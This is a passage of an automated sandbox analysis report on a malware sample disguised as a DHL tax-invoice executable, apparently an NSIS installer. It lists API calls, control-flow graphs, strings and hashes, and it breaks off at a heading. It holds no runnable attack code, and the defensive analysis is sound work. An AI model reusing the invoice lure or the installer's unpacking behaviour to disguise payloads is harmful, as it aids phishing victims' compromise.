                                                            • lstrlenW.KERNEL32(ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\AppData\Local\releve,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,74DF3420), ref: 00403AC8
                                                            • lstrcmpiW.KERNEL32(?,.exe,ExecToStack,?,?,?,ExecToStack,00000000,C:\Users\user\AppData\Local\releve,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403ADB
                                                            • GetFileAttributesW.KERNEL32(ExecToStack), ref: 00403AE6
                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\releve), ref: 00403B2F
                                                            • RegisterClassW.USER32(004291E0), ref: 00403B6C
                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B84
                                                            • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403BB9
                                                            • ShowWindow.USER32(00000005,00000000), ref: 00403BEF
                                                            • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403C1B
                                                            • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403C28
                                                            • RegisterClassW.USER32(004291E0), ref: 00403C31
                                                            • DialogBoxParamW.USER32(?,00000000,00403D6A,00000000), ref: 00403C50
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                                            • String ID: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\releve$Control Panel\Desktop\ResourceLocale$ExecToStack$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                            • API String ID: 606308-2161404446
                                                            • Opcode ID: d6eb97ecc45ceecdb0e2d203f76fda1198e4e833a1627c35b81ac0c75580ce77
                                                            • Instruction ID: e7f44595d902892b35b801f2f0c3734befc0b18a393fec54347386a87508d522
                                                            • Opcode Fuzzy Hash: d6eb97ecc45ceecdb0e2d203f76fda1198e4e833a1627c35b81ac0c75580ce77
                                                            • Instruction Fuzzy Hash: 8661C570244200BAD730AF669D49E2B3A7CEB84B49F40453FF981B62E2DB7D5912C63D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402E41 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 474 402e41-402e8f GetTickCount GetModuleFileNameW call 405d53 477 402e91-402e96 474->477 478 402e9b-402ec9 call 40617e call 405b7e call 40617e GetFileSize 474->478 479 4030e0-4030e4 477->479 486 402fb9-402fc7 call 402d9f 478->486 487 402ecf-402ee6 478->487 494 403098-40309d 486->494 495 402fcd-402fd0 486->495 488 402ee8 487->488 489 402eea-402ef7 call 403358 487->489 488->489 498 403054-40305c call 402d9f 489->498 499 402efd-402f03 489->499 494->479 496 402fd2-402fea call 40336e call 403358 495->496 497 402ffc-403048 GlobalAlloc call 406677 call 405d82 CreateFileW 495->497 496->494 522 402ff0-402ff6 496->522 524 40304a-40304f 497->524 525 40305e-40308e call 40336e call 4030e7 497->525 498->494 502 402f83-402f87 499->502 503 402f05-402f1d call 405d0e 499->503 506 402f90-402f96 502->506 507 402f89-402f8f call 402d9f 502->507 503->506 521 402f1f-402f26 503->521 513 402f98-402fa6 call 406609 506->513 514 402fa9-402fb3 506->514 507->506 513->514 514->486 514->487 521->506 526 402f28-402f2f 521->526 522->494 522->497 524->479 533 403093-403096 525->533 526->506 528 402f31-402f38 526->528 528->506 530 402f3a-402f41 528->530 530->506 532 402f43-402f63 530->532 532->494 534 402f69-402f6d 532->534 533->494 537 40309f-4030b0 533->537 535 402f75-402f7d 534->535 536 402f6f-402f73 534->536 535->506 538 402f7f-402f81 535->538 536->486 536->535 539 4030b2 537->539 540 4030b8-4030bd 537->540 538->506 539->540 541 4030be-4030c4 540->541 541->541 542 4030c6-4030de call 405d0e 541->542 542->479
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00402E55
                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,00000400), ref: 00402E71
                                                              • Part of subcall function 00405D53: GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,80000000,00000003), ref: 00405D57
                                                              • Part of subcall function 00405D53: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79
                                                            • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe,80000000,00000003), ref: 00402EBA
                                                            • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403001
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                            • String ID: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                            • API String ID: 2803837635-872889490
                                                            • Opcode ID: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                            • Instruction ID: e866f1dd798e5fb15c0a347603bcfded6ce2f229c2e481af73dd86df93422dd6
                                                            • Opcode Fuzzy Hash: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                            • Instruction Fuzzy Hash: 9761C431A00215ABDB209F75DD49B9E7BB8EB00359F20817FF500F62D1DABD9A448B5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401767 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 145stringtimeCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 671 401767-40178c call 402bbf call 405ba9 676 401796-4017a8 call 40617e call 405b32 lstrcatW 671->676 677 40178e-401794 call 40617e 671->677 682 4017ad-4017ae call 406412 676->682 677->682 686 4017b3-4017b7 682->686 687 4017b9-4017c3 call 4064c1 686->687 688 4017ea-4017ed 686->688 695 4017d5-4017e7 687->695 696 4017c5-4017d3 CompareFileTime 687->696 689 4017f5-401811 call 405d53 688->689 690 4017ef-4017f0 call 405d2e 688->690 698 401813-401816 689->698 699 401885-4018ae call 4052dd call 4030e7 689->699 690->689 695->688 696->695 700 401867-401871 call 4052dd 698->700 701 401818-401856 call 40617e * 2 call 4061a0 call 40617e call 4058c3 698->701 711 4018b0-4018b4 699->711 712 4018b6-4018c2 SetFileTime 699->712 713 40187a-401880 700->713 701->686 733 40185c-40185d 701->733 711->712 715 4018c8-4018d3 FindCloseChangeNotification 711->715 712->715 716 402a55 713->716 718 4018d9-4018dc 715->718 719 402a4c-402a4f 715->719 720 402a57-402a5b 716->720 723 4018f1-4018f4 call 4061a0 718->723 724 4018de-4018ef call 4061a0 lstrcatW 718->724 719->716 730 4018f9-40228d call 4058c3 723->730 724->730 730->719 730->720 733->713 735 40185f-401860 733->735 735->700
                                                            APIs
                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                            • CompareFileTime.KERNEL32(-00000014,?,ExecToStack,ExecToStack,00000000,00000000,ExecToStack,C:\Users\user\AppData\Local\releve,?,?,00000031), ref: 004017CD
                                                              • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
                                                              • Part of subcall function 004052DD: lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                              • Part of subcall function 004052DD: lstrlenW.KERNEL32(00402E19,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                              • Part of subcall function 004052DD: lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00402E19), ref: 00405338
                                                              • Part of subcall function 004052DD: SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll), ref: 0040534A
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                            • String ID: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll$C:\Users\user\AppData\Local\releve$ExecToStack
                                                            • API String ID: 1941528284-4006103106
                                                            • Opcode ID: adcefff22d6d35a46cade79b64999059c3ac28fc575844980da9404600bf010c
                                                            • Instruction ID: b64174440326d41e90dd14f1ad6608c73badddfa8ee8632f400ec40acf256ac3
                                                            • Opcode Fuzzy Hash: adcefff22d6d35a46cade79b64999059c3ac28fc575844980da9404600bf010c
                                                            • Instruction Fuzzy Hash: 0C41C431900515BACF117FB5CC46DAE3679EF05329B20827BF422F51E2DA3C86629A6D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004052DD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 737 4052dd-4052f2 738 4052f8-405309 737->738 739 4053a9-4053ad 737->739 740 405314-405320 lstrlenW 738->740 741 40530b-40530f call 4061a0 738->741 743 405322-405332 lstrlenW 740->743 744 40533d-405341 740->744 741->740 743->739 745 405334-405338 lstrcatW 743->745 746 405350-405354 744->746 747 405343-40534a SetWindowTextW 744->747 745->744 748 405356-405398 SendMessageW * 3 746->748 749 40539a-40539c 746->749 747->746 748->749 749->739 750 40539e-4053a1 749->750 750->739
                                                            APIs
                                                            • lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                            • lstrlenW.KERNEL32(00402E19,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                            • lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,00402E19), ref: 00405338
                                                            • SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll), ref: 0040534A
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                            • String ID: Extract: C:\Users\user\AppData\Local\Temp\nsi41AC.tmp\nsExec.dll
                                                            • API String ID: 2531174081-1556000805
                                                            • Opcode ID: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                            • Instruction ID: d14990956ab1253184f877e9e8298894284f42a30aea32824f5004b5108fa95f
                                                            • Opcode Fuzzy Hash: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                            • Instruction Fuzzy Hash: 62217F71900518BACF119FA6DD44ACFBFB8EF85354F10807AF904B62A1C7B94A51DFA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004057AC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 751 4057ac-4057f7 CreateDirectoryW 752 4057f9-4057fb 751->752 753 4057fd-40580a GetLastError 751->753 754 405824-405826 752->754 753->754 755 40580c-405820 SetFileSecurityW 753->755 755->752 756 405822 GetLastError 755->756 756->754
                                                            APIs
                                                            • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004057EF
                                                            • GetLastError.KERNEL32 ref: 00405803
                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405818
                                                            • GetLastError.KERNEL32 ref: 00405822
                                                            Strings
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004057D2
                                                            • C:\Users\user\Desktop, xrefs: 004057AC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                            • API String ID: 3449924974-2028306314
                                                            • Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                            • Instruction ID: b278f7ea68de5888e34302da86fdb06c438f4ef9b03e74a9ab654546e4f81ce2
                                                            • Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                            • Instruction Fuzzy Hash: 89010871D00619DADF10DBA0D9447EFBFB8EB04304F00803ADA44B6190E7789618DFA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004064E8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 757 4064e8-406508 GetSystemDirectoryW 758 40650a 757->758 759 40650c-40650e 757->759 758->759 760 406510-406519 759->760 761 40651f-406521 759->761 760->761 762 40651b-40651d 760->762 763 406522-406555 wsprintfW LoadLibraryExW 761->763 762->763
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004064FF
                                                            • wsprintfW.USER32 ref: 0040653A
                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040654E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                            • String ID: %s%S.dll$UXTHEME$\
                                                            • API String ID: 2200240437-1946221925
                                                            • Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                            • Instruction ID: c6b4a3c42f63eea3762d57d51081eb848d485012b63e63803453d9912f42ff06
                                                            • Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                            • Instruction Fuzzy Hash: 3AF0FC70500219BADB10AB64ED0DF9B366CAB00304F10403AA646F10D0EB7CD725CBA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405D82 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 764 405d82-405d8e 765 405d8f-405dc3 GetTickCount GetTempFileNameW 764->765 766 405dd2-405dd4 765->766 767 405dc5-405dc7 765->767 769 405dcc-405dcf 766->769 767->765 768 405dc9 767->768 768->769
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00405DA0
                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe",004033B4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405DBB
                                                            Strings
                                                            • "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe", xrefs: 00405D82
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D87
                                                            • nsa, xrefs: 00405D8F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: "C:\Users\user\Desktop\DHL TAX INVOICES - MARCH 2024.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                            • API String ID: 1716503409-4227925031
                                                            • Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                            • Instruction ID: a69a53d4b23f3d63feeda802a3e8a765614c71270742c911b33c62312df6cecc
                                                            • Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                            • Instruction Fuzzy Hash: 32F06D76600608BBDB008B59DD09AABBBB8EF91710F10803BEE01F7190E6B09A548B64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004031EF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

